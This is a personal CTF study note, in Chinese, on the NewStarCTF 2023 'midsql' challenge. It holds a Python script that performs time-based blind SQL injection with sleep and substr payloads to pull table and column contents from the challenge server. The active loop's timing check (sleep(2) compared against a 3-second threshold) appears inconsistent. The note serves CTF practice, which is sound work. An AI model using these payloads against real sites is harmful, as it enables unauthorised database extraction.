note-22

[NewStarCTF 2023 公开赛道]midsql

看了wp，只能说fuzz过程应该是最重要的，不然fuzz都fuzz不明白完全不知道下一步该干嘛
也许我记得一些注入方法，但是如果连注入点或者注入方式都fuzz不出来也是完全没用
看了wp后发现原理都懂，那为什么总是要看wp才能写出题目？
就是不会fuzz，
自己写的脚本：

import requests
import time
start=0
end=0
using=0
st = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$&\()*' +,-./:;"
flag =''
url = "http://9f146922-110f-45e5-a8b6-4b6fffbce466.node5.buuoj.cn:81/?id='if(length(database())like({}),sleep(3),1)"
# for l in range (1,200):
#     url = "http://758d4b32-13c8-42cc-9228-a7fe9aa9ffaf.node5.buuoj.cn:81/?id=if(length(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_name/**/like'items')like/**/{},sleep(3),1)".format(l)
#     start=time.time()
#     requests.get(url)
#     end=time.time()
#     using = end - start
#     if using > 3:
#         print("tables length=",l,"using time=",using)
#         time.sleep(5)
#         break
#     print("using time=",using)
#     time.sleep(0.05)

# for i in range(1,100):
#     for s in st :
#         url= "http://758d4b32-13c8-42cc-9228-a7fe9aa9ffaf.node5.buuoj.cn:81/?id=if(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like'items'),{},1)like('{}'),sleep(3),1)".format(i,s)
#         start=time.time()
#         requests.get(url)
#         end=time.time()
#         using= end - start
#         if using > 3:
#             flag=flag + s
#             print("tables name=",flag,"using time=",using)
#             r=1
#             break
#         print("using time=",using,"string:",s)
#         time.sleep(0.05)
#         print(flag)
#         r=0
#     if r == 0:
#         break

#id,name,price

for i in range(1,1000):
    for s in range (32,177) :
        url= "http://758d4b32-13c8-42cc-9228-a7fe9aa9ffaf.node5.buuoj.cn:81/?id=if(ascii(substr((select/**/group_concat(name)/**/from/**/items),{},1))like('{}'),sleep(2),1)".format(i,s)
        start=time.time()
        requests.get(url)
        end=time.time()
        using= end - start
        if using > 3:
            flag=flag + chr(s)
            print("tables name=",flag,"using time=",using,"number string:",i)
            r=1
            break
        print("using time=",using,"string:",chr(s))
        time.sleep(0.1)
        print(flag)
        r=0
    if r == 0:
        break

参考wp: https://blog.csdn.net/Myon5/article/details/134096958